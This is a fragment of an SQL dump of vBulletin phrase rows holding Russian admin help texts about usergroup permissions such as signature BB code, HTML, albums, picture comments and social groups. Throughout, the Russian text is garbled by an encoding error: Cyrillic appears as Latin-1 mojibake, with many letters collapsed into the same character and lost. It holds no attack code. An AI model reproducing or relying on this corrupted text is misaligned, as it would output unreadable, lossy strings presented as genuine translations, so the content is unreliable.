(24707, -1, 'usergroup_add_edit_canbbcodehtml_title', 'cphelptext', 'Ãà çðåøèòü BB êîä HTML', 'vbulletin', 'zCarot', 1205493460, '3.7.0 Release Candidate 1'),
(24708, -1, 'usergroup_add_edit_canbbcodequote_text', 'cphelptext', 'Îïðåäåëÿåò, ìîãóò ëè ïîëüçîâà òåëè äà ÃÃîé ãðóïïû èñïîëüçîâà òü â ñâîèõ ïîäïèñÿõ BB êîä [quote]. Åñëè âû óêà æèòå \"Ãåò\", òî ïðè ïîïûòêå ñîõðà Ãèòü ïîäïèñü ñ Ãà ëè÷èåì äà ÃÃîãî BB êîäà ïîëüçîâà òåëü ýòîé ãðóïïû ïîëó÷èò ñîîáùåÃèå îá îøèáêå.', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(24709, -1, 'usergroup_add_edit_canbbcodequote_title', 'cphelptext', 'Ãà çðåøèòü BB êîä öèòà òû', 'vbulletin', 'zCarot', 1205493460, '3.7.0 Release Candidate 1'),
(24710, -1, 'usergroup_add_edit_allowimg_text', 'cphelptext', 'Îïðåäåëÿåò, ìîãóò ëè ïîëüçîâà òåëè äà ÃÃîé ãðóïïû èñïîëüçîâà òü â ñâîèõ ïîäïèñÿõ BB êîä [img]. Åñëè âû óêà æèòå \"Ãåò\", òî ïðè ïîïûòêå ñîõðà Ãèòü ïîäïèñü ñ Ãà ëè÷èåì äà ÃÃîãî BB êîäà ó ïîëüçîâà òåëÿ ýòîé ãðóïïû âìåñòî èçîáðà æåÃèÿ áóäåò ññûëêà , Ãèêà êîãî ñîîáùåÃèÿ îá îøèáêå ÃÃ¥ ïîÿâèòñÿ.', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(24711, -1, 'usergroup_add_edit_allowimg_title', 'cphelptext', 'Ãà çðåøèòü [IMG] êîä', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(24712, -1, 'usergroup_add_edit_sigmaximages_text', 'cphelptext', 'Îïðåäåëÿåò ìà êñèìà ëüÃîå êîëè÷åñòâî èçîáðà æåÃèé, êîòîðûå ïîëüçîâà òåëü ìîæåò âêëþ÷èòü â ñâîþ ïîäïèñü. Çäåñü ó÷èòûâà þòñÿ BB êîäû [img], [sigpic] (çà ãðóæåÃÃîå èçîáðà æåÃèå), à òà êæå ñìà éëû. Óêà æèòå çäåñü 0, ÷òîáû ñÃÿòü îãðà Ãè÷åÃèå.', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(24713, -1, 'usergroup_add_edit_sigmaximages_title', 'cphelptext', 'Ìà êñèìà ëüÃîå êîëè÷åñòâî èçîáðà æåÃèé â ïîäïèñè', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(24714, -1, 'usergroup_add_edit_allowsmilies_text', 'cphelptext', 'Îïðåäåëÿåò, ñëåäóåò ëè ðà ñïîçÃà âà òü êîäû ñìà éëîâ è âñòà âëÿòü âìåñòî Ãèõ ñìà éëû â ïîäïèñÿõ ïîëüçîâà òåëåé ýòîé ãðóïïû. Åñëè \"Ãåò\", òî êîäû ñìà éëîâ ÃÃ¥ áóäóò êîÃâåðòèðîâà òüñÿ â èçîáðà æåÃèÿ.', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(24715, -1, 'usergroup_add_edit_allowsmilies_title', 'cphelptext', 'Ãà çðåøèòü ñìà éëû', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(24716, -1, 'usergroup_add_edit_allowhtml_text', 'cphelptext', 'Îïðåäåëÿåò, ðà çðåø¸à ëè HTML êîä â ïîäïèñÿõ ïîëüçîâà òåëåé ýòîé ãðóïïû. Ãðè ðà çðåøåÃèè HTML âû ïîäâåðãà åòå ôîðóì îïà ñÃîñòè! ÃÃ¥ âêëþ÷à éòå ýòó îïöèþ, åñëè âû ÃÃ¥ ïîëÃîñòüþ äîâåðÿåòå ïîëüçîâà òåëÿì èç ýòîé ãðóïïû.', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(24717, -1, 'usergroup_add_edit_allowhtml_title', 'cphelptext', 'Ãà çðåøèòü HTML', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(24718, -1, 'usergroup_add_edit_candeleteownmessages_text', 'cphelptext', 'Îïðåäåëÿåò, ðà çðåøåÃî ëè ïîëüçîâà òåëÿì ìÿãêî óäà ëÿòü ñâîè ïóáëè÷Ãûå ñîîáùåÃèÿ, îñòà âëåÃÃûå êà ê â ñâî¸ì, òà ê è â ÷óæèõ ïðîôèëÿõ. ÎòÃåñèòåñü âÃèìà òåëüÃî ê ïîõîæåìó ïðà âó - Ìîæåò óïðà âëÿòü ïóáëè÷Ãûìè ñîîáùåÃèÿìè â ñâî¸ì ïðîôèëå , êîòîðîå ïðè ðà çðåøåÃèè äà ñò âîçìîæÃîñòü óäà ëÿòü ñâîè ïóáëè÷Ãûå ñîîáùåÃèÿ , åñëè îÃè áóäóò Ãà õîäèòüñÿ â ïðîôèëå åãî à âòîðà .', 'vbulletin', 'zCarot', 1204246399, '3.7.0 Beta 6'),
(24719, -1, 'usergroup_add_edit_candeleteownmessages_title', 'cphelptext', 'Ìîæåò óäà ëÿòü ñâîè ïóáëè÷Ãûå ñîîáùåÃèÿ', 'vbulletin', 'zCarot', 1197373136, '3.7.0 Beta 1'),
(24720, -1, 'usergroup_add_edit_canalbum_text', 'cphelptext', 'Åñëè \"Äà \", òî ïîëüçîâà òåëü ñìîæåò ñîçäà âà òü à ëüáîìû è çà ãðóæà òü â Ãèõ èçîáðà æåÃèÿ Òðåáóåòñÿ òà êæå ïðà âî \"Ìîæåò ïðîñìà òðèâà òü à ëüáîìû\"', 'vbulletin', 'zCarot', 1199130982, '3.7.0 Beta 4'),
(24721, -1, 'usergroup_add_edit_canalbum_title', 'cphelptext', 'Ìîæåò èìåòü à ëüáîìû è çà ãðóæà òü â Ãèõ èçîáðà æåÃèÿ', 'vbulletin', 'zCarot', 1195733676, '3.7.0 Beta 1'),
(24722, -1, 'usergroup_add_edit_canviewalbum_text', 'cphelptext', 'Åñëè \"Äà \", òî ïîëüçîâà òåëü ñìîæåò ïðîñìà òðèâà òü à ëüáîìû', 'vbulletin', 'zCarot', 1195733981, '3.7.0 Beta 1'),
(24723, -1, 'usergroup_add_edit_canviewalbum_title', 'cphelptext', 'Ìîæåò ïðîñìà òðèâà òü à ëüáîìû', 'vbulletin', 'zCarot', 1195733981, '3.7.0 Beta 1'),
(24724, -1, 'usergroup_add_edit_albumpicmaxwidth_text', 'cphelptext', 'Ìà êñèìà ëüÃî äîïóñòèìà ÿ øèðèÃà èçîáðà æåÃèÿ. Ôîðóì ïîñòà ðà åòñÿ óìåÃüøèòü ðà çìåðû èçîáðà æåÃèÿ äî óêà çà ÃÃûõ âà ìè ïðåäåëîâ, åñëè âêëþ÷¸à ïà ðà ìåòð \"Ãèáëèîòåêà îáðà áîòêè èçîáðà æåÃèé\".', 'vbulletin', 'zCarot', 1195734993, '3.7.0 Beta 1'),
(24725, -1, 'usergroup_add_edit_albumpicmaxwidth_title', 'cphelptext', 'Ìà êñèìà ëüÃà ÿ øèðèÃà èçîáðà æåÃèÿ à ëüáîìîâ (â ïèêñåëÿõ)', 'vbulletin', 'zCarot', 1195734234, '3.7.0 Beta 1'),
(24726, -1, 'usergroup_add_edit_albumpicmaxheight_text', 'cphelptext', 'Ìà êñèìà ëüÃî äîïóñòèìà ÿ âûñîòà èçîáðà æåÃèÿ. Ôîðóì ïîñòà ðà åòñÿ óìåÃüøèòü ðà çìåðû èçîáðà æåÃèÿ äî óêà çà ÃÃûõ âà ìè ïðåäåëîâ, åñëè âêëþ÷¸à ïà ðà ìåòð \"Ãèáëèîòåêà îáðà áîòêè èçîáðà æåÃèé\".', 'vbulletin', 'zCarot', 1195735064, '3.7.0 Beta 1'),
(24727, -1, 'usergroup_add_edit_albumpicmaxheight_title', 'cphelptext', 'Ìà êñèìà ëüÃà ÿ âûñîòà èçîáðà æåÃèÿ à ëüáîìîâ (â ïèêñåëÿõ)', 'vbulletin', 'zCarot', 1195734301, '3.7.0 Beta 1'),
(24728, -1, 'usergroup_add_edit_albummaxpics_text', 'cphelptext', 'Ìà êñèìà ëüÃî äîïóñòèìîå êîëè÷åñòâî èçîáðà æåÃèé, êîòîðîå ìîæåò çà ãðóçèòü ïîëüçîâà òåëü', 'vbulletin', 'zCarot', 1195735277, '3.7.0 Beta 1'),
(24729, -1, 'usergroup_add_edit_albummaxpics_title', 'cphelptext', 'Ìà êñèìà ëüÃîå êîëè÷åñòâî èçîáðà æåÃèé à ëüáîìîâ', 'vbulletin', 'zCarot', 1195735277, '3.7.0 Beta 1'),
(24730, -1, 'usergroup_add_edit_albumpicmaxsize_text', 'cphelptext', 'Ìà êñèìà ëüÃûé ðà çìåð ôà éëà èçîáðà æåÃèÿ. Ôîðóì ïîñòà ðà åòñÿ óìåÃüøèòü ðà çìåðû èçîáðà æåÃèÿ äî óêà çà ÃÃûõ âà ìè ïðåäåëîâ, åñëè âêëþ÷¸à ïà ðà ìåòð \"Ãèáëèîòåêà îáðà áîòêè èçîáðà æåÃèé\".', 'vbulletin', 'zCarot', 1195735300, '3.7.0 Beta 1'),
(24731, -1, 'usergroup_add_edit_albumpicmaxsize_title', 'cphelptext', 'Ìà êñèìà ëüÃûé ðà çìåð ôà éëà èçîáðà æåÃèÿ à ëüáîìîâ (â áà éòà õ)', 'vbulletin', 'zCarot', 1195734373, '3.7.0 Beta 1'),
(24732, -1, 'usergroup_add_edit_albummaxsize_text', 'cphelptext', 'Ìà êñèìà ëüÃûé îáùèé ðà çìåð ôà éëîâ èçîáðà æåÃèé, çà ãðóæåÃÃûõ ïîëüçîâà òåëåì', 'vbulletin', 'zCarot', 1195735356, '3.7.0 Beta 1'),
(24733, -1, 'usergroup_add_edit_albummaxsize_title', 'cphelptext', 'Îáùèé ðà çìåð ôà éëîâ èçîáðà æåÃèé (â áà éòà õ)', 'vbulletin', 'zCarot', 1195735356, '3.7.0 Beta 1'),
(24734, -1, 'usergroup_add_edit_canpiccomment_text', 'cphelptext', 'Åñëè ðà çðåøåÃî, òî ïîëüçîâà òåëè ýòîé ãðóïïû ñìîãóò êîììåÃòèðîâà òü èçîáðà æåÃèÿ, çà ãðóæåÃÃûå â à ëüáîìû äðóãèõ ïîëüçîâà òåëåé. \r\n \r\n×òîáû êîììåÃòèðîâà òü èçîáðà æåÃèå, ïîëüçîâà òåëü äîëæåà èìåòü ïðà âà Ãà ïðîñìîòð äà ÃÃîãî èçîáðà æåÃèÿ. Åñëè Ãåêèé ïîëüçîâà òåëü æåëà åò îãðà Ãè÷èòü êîììåÃòèðîâà Ãèå ñâîèõ èçîáðà æåÃèé, òî îÃ(à ) ìîæåò ñäåëà òü ñâîé à ëüáîì ëè÷Ãûì.', 'vbulletin', 'zCarot', 1205426424, '3.7.0 Release Candidate 1'),
(24735, -1, 'usergroup_add_edit_canpiccomment_title', 'cphelptext', 'Ìîæåò êîììåÃòèðîâà òü èçîáðà æåÃèÿ', 'vbulletin', 'zCarot', 1205426424, '3.7.0 Release Candidate 1'),
(24736, -1, 'usergroup_add_edit_caneditownpiccomment_text', 'cphelptext', 'Åñëè ðà çðåøåÃî, òî ïîëüçîâà òåëè ñìîãóò ðåäà êòèðîâà òü ñâîè êîììåÃòà ðèè ïîñëå îòïðà âêè.', 'vbulletin', 'zCarot', 1205426470, '3.7.0 Release Candidate 1'),
(24737, -1, 'usergroup_add_edit_caneditownpiccomment_title', 'cphelptext', 'Ìîæåò ðåäà êòèðîâà òü ñâîè êîììåÃòà ðèè ê èçîáðà æåÃèÿì', 'vbulletin', 'zCarot', 1205426470, '3.7.0 Release Candidate 1'),
(24738, -1, 'usergroup_add_edit_candeleteownpiccomment_text', 'cphelptext', 'Åñëè ðà çðåøåÃî, òî ïîëüçîâà òåëè äà ÃÃîé ãðóïïû ñìîãóò ìÿãêî óäà ëÿòü ñâîè êîììåÃòà ðèè. Ãà ìåñòå óäà ë¸ÃÃîãî êîììåÃòà ðèÿ áóäåò óâåäîìëåÃèå îá óäà ëåÃèè. \r\n \r\nÃòî óâåäîìëåÃèå, êà ê è îðèãèÃà ë ñîîáùåÃèÿ, áóäåò îòîáðà æà òüñÿ ìîäåðà òîðà ì. Àâòîð èçîáðà æåÃèÿ ñìîæåò óâèäåòü óâåäîìëåÃèå, Ãî ÃÃ¥ ñìîæåò ïðî÷åñòü òåêñò óäà ë¸ÃÃîãî êîììåÃòà ðèÿ.', 'vbulletin', 'zCarot', 1205426749, '3.7.0 Release Candidate 1'),
(24739, -1, 'usergroup_add_edit_candeleteownpiccomment_title', 'cphelptext', 'Ìîæåò óäà ëÿòü ñâîè êîììåÃòà ðèè ê èçîáðà æåÃèÿì', 'vbulletin', 'zCarot', 1205426553, '3.7.0 Release Candidate 1'),
(24740, -1, 'usergroup_add_edit_canmanagepiccomment_text', 'cphelptext', 'Åñëè ðà çðåøåÃî, òî ïîëüçîâà òåëè ñìîãóò óïðà âëÿòü êîììåÃòà ðèÿìè ê ñâîèì èçîáðà æåÃèÿì, à èìåÃÃî:\r\n\r\nÇà ïðåùà òü êîììåÃòà ðèè \r\nÎäîáðÿòü êîììåÃòà ðèè \r\nÌÿãêî óäà ëÿòü êîììåÃòà ðèè \r\n \r\nÃòî ðà çðåøåÃèå ðà ñïðîñòðà Ãÿåòñÿ è Ãà ñîáñòâåÃÃûå êîììåÃòà ðèè ïîëüçîâà òåëÿ ê ñâîèì èçîáðà æåÃèÿì. Ãòî äà ñò âîçìîæÃîñòü ïîëüçîâà òåëþ óäà ëÿòü ñâîè êîììåÃòà ðèè ê ñâîèì æå èçîáðà æåÃèÿì, ÃÃ¥ èìåÿ ïðà â Ãà óäà ëåÃèå ñâîèõ êîììåÃòà ðèåâ ê èçîáðà æåÃèÿì.', 'vbulletin', 'zCarot', 1205426830, '3.7.0 Release Candidate 1'),
(24741, -1, 'usergroup_add_edit_canmanagepiccomment_title', 'cphelptext', 'Ìîæåò óïðà âëÿòü êîììåÃòà ðèÿìè ê ñâîèì èçîáðà æåÃèÿì', 'vbulletin', 'zCarot', 1205426687, '3.7.0 Release Candidate 1'),
(24742, -1, 'usergroup_add_edit_caneditfontfamily_text', 'cphelptext', 'Åñëè \"Äà \", òî ïîëüçîâà òåëü ñìîæåò ðåäà êòèðîâà òü òèï øðèôòà , îòîáðà æà åìîãî â ñâî¸ì ïðîôèëå.', 'vbulletin', 'zCarot', 1195737587, '3.7.0 Beta 1'),
(24743, -1, 'usergroup_add_edit_caneditfontfamily_title', 'cphelptext', 'Ìîæåò ðåäà êòèðîâà òü òèï øðèôòîâ', 'vbulletin', 'zCarot', 1195737587, '3.7.0 Beta 1'),
(24744, -1, 'usergroup_add_edit_caneditfontsize_text', 'cphelptext', 'Åñëè \"Äà \", òî ïîëüçîâà òåëü ñìîæåò ðåäà êòèðîâà òü ðà çìåð øðèôòà , îòîáðà æà åìîãî â ñâî¸ì ïðîôèëå.', 'vbulletin', 'zCarot', 1198868099, '3.7.0 Beta 4'),
(24745, -1, 'usergroup_add_edit_caneditfontsize_title', 'cphelptext', 'Ìîæåò ðåäà êòèðîâà òü ðà çìåð øðèôòîâ', 'vbulletin', 'zCarot', 1195737658, '3.7.0 Beta 1'),
(24746, -1, 'usergroup_add_edit_caneditcolors_text', 'cphelptext', 'Åñëè \"Äà \", òî ïîëüçîâà òåëü ñìîæåò ðåäà êòèðîâà òü öâåòà , îòîáðà æà åìûå â ñâî¸ì ïðîôèëå.', 'vbulletin', 'zCarot', 1195738004, '3.7.0 Beta 1'),
(24747, -1, 'usergroup_add_edit_caneditcolors_title', 'cphelptext', 'Ìîæåò ðåäà êòèðîâà òü öâåòà ', 'vbulletin', 'zCarot', 1195738004, '3.7.0 Beta 1'),
(24748, -1, 'usergroup_add_edit_caneditbgimage_text', 'cphelptext', 'Åñëè \"Äà \", òî ïîëüçîâà òåëü ñìîæåò ðåäà êòèðîâà òü ôîÃîâîå èçîáðà æåÃèå ñâîåãî ïðîôèëÿ.ÃÃŽÃŒÃÈÒÅ Äëÿ ðà áîòû äà ÃÃîãî ïà ðà ìåòðà òðåáóþòñÿ ïðà âà Ãà ñîçäà Ãèå à ëüáîìîâ', 'vbulletin', 'zCarot', 1195738292, '3.7.0 Beta 1'),
(24749, -1, 'usergroup_add_edit_caneditbgimage_title', 'cphelptext', 'Ìîæåò ðåäà êòèðîâà òü ôîÃîâûå èçîáðà æåÃèÿ', 'vbulletin', 'zCarot', 1195738292, '3.7.0 Beta 1'),
(24750, -1, 'usergroup_add_edit_caneditborders_text', 'cphelptext', 'Åñëè \"Äà \", òî ïîëüçîâà òåëü ñìîæåò ðåäà êòèðîâà òü ñòèëü, øèðèÃó è öâåò ãðà Ãèö, îòîáðà æà åìûõ â ñâî¸ì ïðîôèëå.', 'vbulletin', 'zCarot', 1195738675, '3.7.0 Beta 1'),
(24751, -1, 'usergroup_add_edit_caneditborders_title', 'cphelptext', 'Ìîæåò ðåäà êòèðîâà òü ãðà Ãèöû', 'vbulletin', 'zCarot', 1195738675, '3.7.0 Beta 1'),
(24752, -1, 'usergroup_add_edit_cancreategroups_text', 'cphelptext', 'Åñëè \"Äà \", òî ïîëüçîâà òåëü ñìîæåò ñîçäà âà òü Ãîâûå ñîöèà ëüÃûå ãðóïïû (Äëÿ ðà áîòû äà ÃÃîãî ïà ðà ìåòðà òðåáóþòñÿ ïðà âà \"Ìîæåò ïðîñìà òðèâà òü ñîöèà ëüÃûå ãðóïïû\" è \"Ìîæåò âñòóïà òü â ñîöèà ëüÃûå ãðóïïû\").', 'vbulletin', 'zCarot', 1195740476, '3.7.0 Beta 1'),
(24753, -1, 'usergroup_add_edit_cancreategroups_title', 'cphelptext', 'Ìîæåò ñîçäà âà òü ñîöèà ëüÃûå ãðóïïû', 'vbulletin', 'zCarot', 1195740476, '3.7.0 Beta 1'),
(24754, -1, 'usergroup_add_edit_caneditowngroups_text', 'cphelptext', 'Åñëè \"Äà \", òî ïîëüçîâà òåëü ñìîæåò ðåäà êòèðîâà òü äà ÃÃûå ñâîèõ ñîöèà ëüÃûõ ãðóïï. \r\n \r\nÅñëè ãðóïïà ÃÃ¥ èìååò ó÷à ñòÃèêîâ, êðîìå îñÃîâà òåëÿ, òî îñÃîâà òåëü ñìîæåò îòðåäà êòèðîâà òü ýòè äà ÃÃûå, âÃÃ¥ çà âèñèìîñòè îò äà ÃÃîãî ïà ðà ìåòðà .', 'vbulletin', 'zCarot', 1211885079, '3.7.1'),
(24755, -1, 'usergroup_add_edit_caneditowngroups_title', 'cphelptext', 'Ìîæåò ðåäà êòèðîâà òü ñâîè ñîöèà ëüÃûå ãðóïïû', 'vbulletin', 'zCarot', 1195740541, '3.7.0 Beta 1'),
(24756, -1, 'usergroup_add_edit_candeleteowngroups_text', 'cphelptext', 'Åñëè \"Äà \", òî ïîëüçîâà òåëü ñìîæåò óäà ëÿòü ñâîè ñîöèà ëüÃûå ãðóïïû.', 'vbulletin', 'zCarot', 1195740607, '3.7.0 Beta 1'),
(24757, -1, 'usergroup_add_edit_candeleteowngroups_title', 'cphelptext', 'Ìîæåò óäà ëÿòü ñâîè ñîöèà ëüÃûå ãðóïïû', 'vbulletin', 'zCarot', 1195740607, '3.7.0 Beta 1'),
(24758, -1, 'usergroup_add_edit_canviewgroups_text', 'cphelptext', 'Åñëè \"Äà \", òî ïîëüçîâà òåëü ñìîæåò ïðîñìà òðèâà òü ñîöèà ëüÃûå ãðóïïû', 'vbulletin', 'zCarot', 1195740638, '3.7.0 Beta 1'),
(24759, -1, 'usergroup_add_edit_canviewgroups_title', 'cphelptext', 'Ìîæåò ïðîñìà òðèâà òü ñîöèà ëüÃûå ãðóïïû', 'vbulletin', 'zCarot', 1195740760, '3.7.0 Beta 1'),
(24760, -1, 'usergroup_add_edit_canmanagemessages_text', 'cphelptext', 'Åñëè \"Äà \", òî ïîëüçîâà òåëü ñìîæåò óïðà âëÿòü ñâîèìè ñîîáùåÃèÿìè â ñîöèà ëüÃûõ ãðóïïà õ', 'vbulletin', 'zCarot', 1195740878, '3.7.0 Beta 1'),
(24761, -1, 'usergroup_add_edit_canmanagemessages_title', 'cphelptext', 'Ìîæåò óïðà âëÿòü ñîîáùåÃèÿìè â ñâîèõ ñîöèà ëüÃûõ ãðóïïà õ', 'vbulletin', 'zCarot', 1195740878, '3.7.0 Beta 1'),
(24762, -1, 'usergroup_add_edit_canpostnonmembergroup_text', 'cphelptext', 'Åñëè \"Äà \", òî ïîëüçîâà òåëü ñìîæåò îòïðà âëÿòü ñîîáùåÃèÿ â ãðóïïû, ó÷à ñòÃèêîì êîòîðûõ ÃÃ¥ ÿâëÿåòñÿ.', 'vbulletin', 'zCarot', 1195740925, '3.7.0 Beta 1'),
(24763, -1, 'usergroup_add_edit_canpostnonmembergroup_title', 'cphelptext', 'Ìîæåò îñòà âëÿòü ñîîáùåÃèÿ â ãðóïïà õ, â êîòîðûõ ÃÃ¥ ñîñòîèò', 'vbulletin', 'zCarot', 1195740925, '3.7.0 Beta 1'),
(24764, -1, 'usergroup_add_edit_canmanageowngroups_text', 'cphelptext', 'Ãà çðåøà ÿ ïîëüçîâà òåëþ óïðà âëÿòü ñâîèìè ñîöèà ëüÃûìè ãðóïïà ìè, âû òåì ñà ìûì äà ¸òå ïðà âà Ãà ñëåäóþùåå:\r\n\r\nÇà ïðåùåÃèå ñîîáùåÃèé \r\nÎäîáðåÃèå ñîîáùåÃèé \r\nÌÿãêîå óäà ëåÃèå ñîîáùåÃèé \r\nÓäà ëåÃèå èçîáðà æåÃèé èç ãðóïïû (èçîáðà æåÃèÿ âñ¸ åù¸ îñòà Ãóòñÿ â à ëüáîìà õ èõ à âòîðîâ) \r\nËèøåÃèå ÷ëåÃñòâà ïîëüçîâà òåëÿ â ãðóïïå \r\n \r\nÅñëè â îñÃîâÃûõ Ãà ñòðîéêà õ ðà çðåøåÃà ïðèÃóäèòåëüÃà ÿ ïðîâåðêà ñîîáùåÃèé ãðóïï, òî â äîïîëÃÃ¥Ãèå ê âûøåñêà çà ÃÃîìó, ïîëüçîâà òåëè ñìîãóò ñîçäà âà òü ãðóïïû, ãäå ñîîáùåÃèÿ, ïåðåä ïóáëè÷Ãûì îòîáðà æåÃèåì, áóäóò ïðîâåðÿòüñÿ îñÃîâà òåëåì ãðóïïû èëè à äìèÃèñòðà öèåé ôîðóìà . \r\n \r\nÂÃÃ¥ çà âèñèìîñòè îò äà ÃÃîãî ðà çðåøåÃèÿ, ïîëüçîâà òåëè ñìîãóò ñà ìîñòîÿòåëüÃî óïðà âëÿòü çà ÿâêà ìè Ãà âñòóïëåÃèÿ â ãðóïïó, à òà êæå îòïðà âëÿòü ïðèãëà øåÃèÿ Ãà âñòóïëåÃèå.', 'vbulletin', 'zCarot', 1205427073, '3.7.0 Release Candidate 1'),
(24765, -1, 'usergroup_add_edit_canmanageowngroups_title', 'cphelptext', 'Ìîæåò óïðà âëÿòü ñâîèìè ñîöèà ëüÃûìè ãðóïïà ìè', 'vbulletin', 'zCarot', 1205427073, '3.7.0 Release Candidate 1'),
(24766, -1, 'usergroup_addleader_text', 'cphelptext', 'Ãà ýòîé ñòðà Ãèöå âû ìîæåòå äîáà âèòü Ãîâîãî ëèäåðà îäÃîé èç ãðóïï ïîëüçîâà òåëåé. Âûáåðèòå ãðóïïó Ãèæå è ââåäèòå òî÷Ãîå èìÿ ïîëüçîâà òåëÿ, êîòîðîãî õîòèòå Ãà çÃà ÷èòü ëèäåðîì, çà òåì Ãà æìèòå \"Äîáà âèòü\" äëÿ ïðîäîëæåÃèÿ. \r\n Ëèäåðû ïîëüçîâà òåëüñêèõ ãðóïï ìîãóò ïîäòâåðæäà òü çà ÿâêè Ãà âñòóïëåÃèå â èõ ãðóïïó â ñåêöèè Ãðóïïû ïîëüçîâà òåëåé â ñâî¸ì êà áèÃåòå.', 'vbulletin', '', 0, ''),
(24767, -1, 'usergroup_addleader_title', 'cphelptext', 'Äîáà âèòü Ãîâîãî ëèäåðà ãðóïïû', 'vbulletin', '', 0, ''),
(24768, -1, 'usergroup_addleader_usergroupid_text', 'cphelptext', 'Âûáåðèòå ãðóïïó ïîëüçîâà òåëåé, ê êîòîðîé âû õîòèòå äîáà âèòü ëèäåðà .', 'vbulletin', '', 0, ''),
(24769, -1, 'usergroup_addleader_usergroupid_title', 'cphelptext', 'Ãðóïïà ïîëüçîâà òåëåé', 'vbulletin', '', 0, ''),
(24770, -1, 'usergroup_addleader_username_text', 'cphelptext', 'Ââåäèòå òî÷Ãîå èìÿ ïîëüçîâà òåëÿ, êîòîðîãî âû õîòèòå ñäåëà òü ëèäåðîì ýòîé ãðóïïû.', 'vbulletin', '', 0, ''),
(24771, -1, 'usergroup_addleader_username_title', 'cphelptext', 'Èìÿ', 'vbulletin', '', 0, ''),
(24772, -1, 'usergroup_edit_text', 'cphelptext', 'Ãòà ñòðà Ãèöà ïîçâîëÿåò âà ì ðåäà êòèðîâà òü ðà çðåøåÃèÿ è Ãà ñòðîéêè äëÿ ýòîé ãðóïïû ïîëüçîâà òåëåé. Ñìîòðèòå ñïðà âêó Ãèæå åñëè òðåáóþòñÿ îñîáûå Ãà ñòðîéêè ïðà â äîñòóïà .', 'vbulletin', '', 0, ''),
(24773, -1, 'usergroup_edit_title', 'cphelptext', 'Ãåäà êòèðîâà òü ãðóïïó', 'vbulletin', '', 0, ''),
(24774, -1, 'usergroup_edit_add_canalwayscreatediscussion_text', 'cphelptext', 'Åñëè \"Äà \", òî ïîëüçîâà òåëü ñìîæåò Ãà ÷èÃà òü Ãîâûå äèñêóññèè â ãðóïïà õ, äà æå åñëè:\r\n\r\nÃîëüçîâà òåëü ÃÃ¥ ÿâëÿåòñÿ ó÷à ñòÃèêîì ãðóïïû. \r\n ãðóïïå âêëþ÷åÃà îïöèÿ \"Ãîëüçîâà òåëè äîëæÃû âñòóïèòü â ãðóïïó, ÷òîáû ïðîñìà òðèâà òü å¸\". \r\n ãðóïïå âêëþ÷åÃà îïöèÿ \"Òîëüêî óïðà âëÿþùèé ìîæåò Ãà ÷èÃà òü Ãîâûå äèñêóññèè\". \r\n \r\n\r\nÃîìÃèòå: Åñëè \"Äà \", òî ïîëüçîâà òåëü ñìîæåò ïðîñìà òðèâà òü ãðóïïû, äà æå åñëè îÃè Ãà ñòðîåÃû ñ âêëþ÷åÃÃûì ïà ðà ìåòðà ìè \"Òîëüêî äëÿ ñâîèõ\" è \"Ãîëüçîâà òåëè äîëæÃû âñòóïèòü â ãðóïïó, ÷òîáû ïðîñìà òðèâà òü å¸\".', 'vbulletin', 'zCarot', 1225812813, '3.8.0 Beta 2'),
(24775, -1, 'usergroup_edit_add_canalwayscreatediscussion_title', 'cphelptext', 'Âñåãäà ìîæåò ñîçäà âà òü äèñêóññèè â ñîöèà ëüÃûõ ãðóïïà õ', 'vbulletin', 'zCarot', 1211992891, '3.7.1'),
(24776, -1, 'usergroup_edit_add_canalwayspostmessage_text', 'cphelptext', 'Åñëè \"Äà \", òî ïîëüçîâà òåëü âñåãäà ñìîæåò îòïðà âëÿòü Ãîâûå ñîîáùåÃèÿ â ñîöèà ëüÃûõ ãðóïïà õ, äà æå åñëè:\r\n\r\n\r\nÂêëþ÷åÃà îïöèÿ \"Ãîëüçîâà òåëè äîëæÃû âñòóïèòü â ãðóïïó, ÷òîáû ïðîñìà òðèâà òü å¸\". \r\nÃîëüçîâà òåëü ÃÃ¥ ÿâëÿåòñÿ ó÷à ñòÃèêîì ýòîé ãðóïïû. \r\n \r\n\r\nÃîìÃèòå: Åñëè \"Äà \", òî ïîëüçîâà òåëü ñìîæåò ïðîñìà òðèâà òü ãðóïïû, äà æå åñëè îÃè Ãà ñòðîåÃû ñ âêëþ÷åÃÃûì ïà ðà ìåòðà ìè \"Òîëüêî äëÿ ñâîèõ\" è \"Ãîëüçîâà òåëè äîëæÃû âñòóïèòü â ãðóïïó, ÷òîáû ïðîñìà òðèâà òü å¸\".', 'vbulletin', 'zCarot', 1225812938, '3.8.0 Beta 2'),
(24777, -1, 'usergroup_edit_add_canalwayspostmessage_title', 'cphelptext', 'Âñåãäà ìîæåò îòâå÷à òü â ñîöèà ëüÃûõ ãðóïïà õ', 'vbulletin', 'zCarot', 1211992802, '3.7.1'),
(24778, -1, 'usergroup_edit_add_cananimategroupicon_text', 'cphelptext', 'Åñëè \"Äà \", òî ïîëüçîâà òåëü, êîòîðûé ìîæåò çà ãðóæà òü èêîÃêè ñîöèà ëüÃûõ ãðóïï, ñìîæåò çà ãðóæà òü è à Ãèìèðîâà ÃÃûé gif â êà ÷åñòâå èêîÃêè.', 'vbulletin', 'zCarot', 1216130125, '3.8.0 Alpha 1'),
(24779, -1, 'usergroup_edit_add_cananimategroupicon_title', 'cphelptext', 'Ìîæåò çà ãðóæà òü à Ãèìèðîâà ÃÃûå èêîÃêè ãðóïï', 'vbulletin', 'zCarot', 1216130125, '3.8.0 Alpha 1'),
(24780, -1, 'usergroup_edit_add_cancreatediscussion_text', 'cphelptext', 'Åñëè \"Äà \", òî ïîëüçîâà òåëü ñìîæåò Ãà ÷èÃà òü Ãîâûå äèñêóññèè â òåõ ãðóïïà õ, ãäå ýòî ÃÃ¥ çà ïðåùåÃî.', 'vbulletin', 'zCarot', 1210937940, '3.7.1'),
(24781, -1, 'usergroup_edit_add_cancreatediscussion_title', 'cphelptext', 'Ìîæåò ñîçäà âà òü Ãîâûå äèñêóññèè â ãðóïïà õ', 'vbulletin', 'zCarot', 1210937940, '3.7.1'),
